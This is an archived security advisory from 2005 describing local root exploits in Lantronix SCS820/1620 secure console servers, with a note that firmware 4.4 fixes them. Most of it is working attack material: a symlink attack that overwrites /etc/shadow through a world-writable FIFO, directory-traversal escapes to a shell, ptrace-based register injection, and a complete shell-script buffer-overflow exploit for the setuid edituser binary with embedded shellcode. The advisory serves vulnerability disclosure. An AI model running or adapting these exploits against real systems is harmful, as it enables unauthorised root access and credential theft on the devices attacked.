<<< Date Index >>>     <<< Thread Index >>>

Root exploits in Lantonix Secure Console Server



 /*
  
*****************************************************************************************************************
  $ An open security advisory #11 - Lantronix SCS Local Root Exploits
  
*****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com || c0ntex[@]open-security.org
  2: Bug Released: August 05 2005
  3: Bug Impact Rate: Hi
  4: Bug Scope Rate: Local
  
*****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial 
gain.
  
*****************************************************************************************************************

  SCS820/1620 - Lantronix Secure Console Server
  http://www.lantronix.com

  "The SCS820 and SCS1620 are members of the ActiveLinx family of secure 
console servers (SCS).
  With ActiveLinx secure console servers, system administrators can tackle 
local and remote IT
  incidents in record time. IT professionals gain key business advantages such 
as reduced time
  attending problems and lowered total cost of ownership for equipment and 
maintenance. Secure
  console servers provide a significant return on investment with faster 
problem solving
  capabilities and higher uptime."


  Multiple security issues with Lantronix Secure Console Server mean that it is 
trivial for a
  user to become root and cause trouble on the system by abusing buffer 
overflows and insecure
  file system configurations.


  1) Insecure /tmp and pipe permissions.
  2) Directory traversal allowing local users unauthorised access to underlying 
Linux OS.
  3) Sysadmin gains local root by abusing the fact that ci does not drop root 
privileges.
  4) All users local root via edituser using return-to-libc and generic stack 
smash.


  Lantronix have released a fix for these issues in their latest patch, 
Firmware v4.4


  Example 1:  Overwrite root owned files
  ----------
  [c0ntex@SCS1620 /tmp]$ ls -al
  total 2
  drwxrwxrwx   2 root     root         1024 Oct 31 00:50 ./
  drwxr-xr-x  16 root     root         1024 Oct 20 11:38 ../
  prw-rw-rw-   1 root     root            0 Oct 31 00:14 listen_fifo_server|


  [c0ntex@SCS1620 /tmp]$ mv listen_fifo_server listen_fifo_server.orig
  [c0ntex@SCS1620 /tmp]$ ln -s /etc/shadow listen_fifo_server

  Now user waits for system administrator to log in and do some work on the 
console:
 
  sysadmin>listen 01
  Please wait for connection..
  sysadmin-DEVICE_01>logout

  [sysadmin@SCS1620 /tmp]$ su - root
  Password:
  su: incorrect password  # odd......

  From another window:
  [root@SCS1620 /tmp]# head /etc/shadow
  j /tmp/listen_fifo_5226;DEVICE_0121:0:99999:7:-1:-1:134550324
  bin:*:11529:0:99999:7:::
  daemon:*:11529:0:99999:7:::
  adm:*:11529:0:99999:7:::


  Example 2:  Directory traversal to gain access to underlying system
  ----------
  c0ntex>?
  Commands:
  alias           - List command aliases
  cat             - Print history buffer
  clear           - Clear port buffer
  connections     - show active connections
  ...
  c0ntex>/bin/bash
  /bin/bash: unknown command
  c0ntex>
  c0ntex>
  c0ntex>../../../bin/bash
  [c0ntex@SCS1620 /var/tmp]$


  Example 3:  Sysadmin becomes root
  ----------
  sysadmin>
  sysadmin>
  sysadmin>bash
  sysadmin@SCS1620 /var/tmp$
  sysadmin@SCS1620 /var/tmp$
  sysadmin@SCS1620 /var/tmp$ cat /etc/shadow
  cat: /etc/shadow: Permission denied
  sysadmin@SCS1620 /var/tmp$
  sysadmin@SCS1620 /var/tmp$
  sysadmin@SCS1620 /var/tmp$ exit
  sysadmin>../../../bin/cat /etc/shadow
  
root:$1$kjhfiusdhf9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
  bin:*:11529:0:99999:7:::
  daemon:*:11529:0:99999:7:::
  ...
  sysadmin>../../../bin/vi
  ~
  ~ 
  ~
  ~
  ~
  :!cat /etc/shadow
  
root:$1$kjhsfsdfsdff9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
  bin:*:11529:0:99999:7:::
  daemon:*:11529:0:99999:7:::
  ...
  ~
  ~
  ~
  ~
  ~
  :q!


  Run bash from the ci interface as sysadmin and from strace, we get the 
following:

  sysadmin>bash
  ...
  14441 [400d8367] getuid()               = 500
  14441 [400f775b] setresuid(ruid 4294967295, euid 500, suid 4294967295) = 0

  and via directory traversal:

  sysadmin> ../../../bin/bash
  ...
  14392 [400ab367] getuid()               = 500
  14392 [400ab3c7] getgid()               = 100
  14392 [400ab397] geteuid()              = 0
  14392 [400ab3f7] getegid()              = 100
  ...

  sysadmin>../../../home/sysadmin/snakeoil 10719

  Attached process [10719] OK!
  ++ Stack regsiters for PID of [10719] ++
        Stack Address of %eax = [0xfffffe00]
        Stack Address of %ecx = [0xbffff100]
        Stack Address of %edx = [0x00000000]
        Stack Address of %ebx = [0xffffffff]
        Stack Address of %esp = [0xbffff0c8]
        Stack Address of %ebp = [0xbffff0e8]
        Stack Address of %esi = [0x00000000]
        Stack Address of %edi = [0xffffffff]
        Stack Address of %eip = [0x400d79a9]

  Injecting %eip register with [0xbffff2bb]

  ++ Stack regsiters for PID of [10719] ++
        Stack Address of %eax = [0xfffffe00]
        Stack Address of %ecx = [0xbffff100]
        Stack Address of %edx = [0x00000000]
        Stack Address of %ebx = [0xffffffff]
        Stack Address of %esp = [0xbffff0c8]
        Stack Address of %ebp = [0xbffff0e8]
        Stack Address of %esi = [0x00000000]
        Stack Address of %edi = [0xffffffff]
        Stack Address of %eip = [0xbffff2bb]
  Detached process [10719] OK!

  bash# 


  Example 4:  Become root - Buffer overflow in edituser binary

  The edituser binary is used to edit a users configuration parameters found in 
UserName.conf.
  It lets you set escape sequences, server permissions and other basic user 
permissions and
  features of the Secure Console Server.

  During exploitation, edituser will strip \xff from the input, so you have to 
use a retaddr
  that does not have the standard 0xbfff1234 type address. By creating a large 
pad environment
  variable before running the test you can nudge your shellcode to a nice 
location, such as
  0xbffe1234, which lets us get round this trivial obstacle. The return-to-libc 
method also
  needs the stack nudge since the address for "/bin/sh" is stored in the 
environment.

  [sysadmin@SCS1620 /usr/local/bin]$ ls -al edituser
  -rwsr-xr-x    1 root     root        12912 Apr 15  2003 edituser
  [sysadmin@SCS1620 /usr/local/bin]$ su - c0ntex
  Password:
  bash$ cp `which edituser` . && gdb -q ./edituser
  no debugging symbols found)...gdb>
  gdb>
  gdb>r -b `perl -e 'printf "\x41" x 70'`
  escape sequence is too long.
  (no debugging symbols found)...(no debugging symbols found)...(no debugging 
symbols found)...(no
  debugging symbols found)...
  Program received signal SIGSEGV, Segmentation fault.
  
_______________________________________________________________________________
       eax:00000000 ebx:00000004  ecx:4001A94B  edx:4010B140     eflags:00010246
       esi:0804BC0C edi:00000000  esp:BFFEC748  ebp:41414141     eip:41414141
       cs:0023  ds:002B  es:002B  fs:0000  gs:0000  ss:002B    o d I t s Z a P c
  
[002B:BFFEC748]---------------------------------------------------------[stack]
  BFFEC778 : 28 D6 04 08  6C C9 10 40 - 70 A8 00 40  94 F8 FE BF 
(...l..@xxx@....
  BFFEC768 : 8C 9B 04 08  01 00 00 00 - 60 BC 04 08  08 BC 04 08 
........`.......
  BFFEC758 : BC BC 04 08  F0 C7 FE BF - 01 00 00 00  48 F8 FE BF 
............H...
  BFFEC748 : 41 41 41 41  41 41 41 41 - 41 41 00 08  FF FF FF FF 
AAAAAAAAAA......
  [002B:0804BC0C]---------------------------------------------------------[ 
data]
  0804BC0C : 39 BA 01 40  2C BA 01 40 - 1E BA 01 40  10 BA 01 40 
9..@,..@...@...@
  0804BC1C : 00 00 00 00  00 00 00 00 - 03 00 00 00  00 00 00 00 
................
  [0023:41414141]---------------------------------------------------------[ 
code]
  0x41414141:     Error while running hook_stop:
  Error while running hook_stop:
  Cannot access memory at address 0x41414141
  0x41414141 in ?? ()
  gdb> q


  //return-to-libc version for non-exec-stack systems

  [c0ntex@SCS1620 ~]$ id -a
  uid=501(c0ntex) gid=501(c0ntex) groups=501(c0ntex)
  [c0ntex@SCS1620 ~]$ export STACKPAD=`perl -e 'print "A" x 65000'`
  [c0ntex@SCS1620 /home/c0ntex]$  edituser -e `perl -e 'print "A" x 56'``printf 
"\x70\xe6\x05\x40\x70\xe6\x05\x40\x81\xfd\xfe\xbf"`
  escape sequence is too long.
  bash: /bin/bash/.bashrc: Not a directory
  bash#


  //general stack-smash version for older boxes

  #!/bin/sh
  # Lantronix Secure Console Server edituser root exploit by
  # c0ntex - c0ntexb@xxxxxxxxx | c0ntex@xxxxxxxxxxxxxxxxx
  # Advisory @ http://www.open-security.org/advisories/11
  #
  # The Linux system supplied by Lantronix does not have gnu
  # C compiler, so the exploit is provided as a shell script
  # as such, you might need to change the address for 
  #
  #[c0ntex@SCS1620 ~/exploit]$ sh edituserxp.sh
  #
  # **** *** *** *** *** *** *** *** ***
  #[-] Local root exploit for edituser using return-to-libc
  #[-] discovered and written by c0ntex | c0ntexb@xxxxxxxxx
  #Expect a root shell :-)  ->  escape sequence is too long.
  #bash# id -a
  #uid=0(root) gid=0(root) groups=100(users),0(root),200(admin)
  #bash#
  #
  BUFFPAD="OPEN-SECURITY.ORG**OPEN-SECURITY.ORG**OPEN-SECURITY.ORG!"
  NOPSLED=`perl -e 'print "\x41" x 1000'`
  RETADDR=`printf "\x74\xc2\xfe\xbf"`
  SETUID=`printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80"`
  SHELL=`printf 
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"`
  STACKPAD=`perl -e 'print "A" x 65000'`
  VULNAP=/usr/local/bin/edituser
  VULNOP="-e"

  export BUFFPAD NOPSLED RETADDR SETUID SHELL STACKPAD VULNAP VULNOP

  printf "\n **** *** *** *** *** *** *** *** ***\n"
  printf "[-] Local root exploit for edituser\n"
  printf "[-] discovered and written by c0ntex\n"

  if [ -f $VULNAPP ] ; then
        printf "Expect a root shell :-)  ->  "; sleep 1
        $VULNAP $VULNOP $BUFFPAD$RETADDR$NOPSLED$SETUID$SHELL
        success=$?
        if [ $success -gt 0 ] ; then
                printf "\nSeems something messed up, changing NOPBUF to 10000 
and trying again!\n"
                sleep 2
                unset NOPSLED
                NOPSLED=`perl -e 'print "\x41" x 10000'`
                printf "Expect a root shell :-)  ->  "
                $VULNAP $VULNOP $BUFFPAD$RETADDR$NOPSLED$SETUID$SHELL
                success=$?
                if [ $success -gt 0 ] ; then
                        printf "\nAgain it failed, sorry you are on your own 
now :(\n"
                fi
        fi
  fi

EOF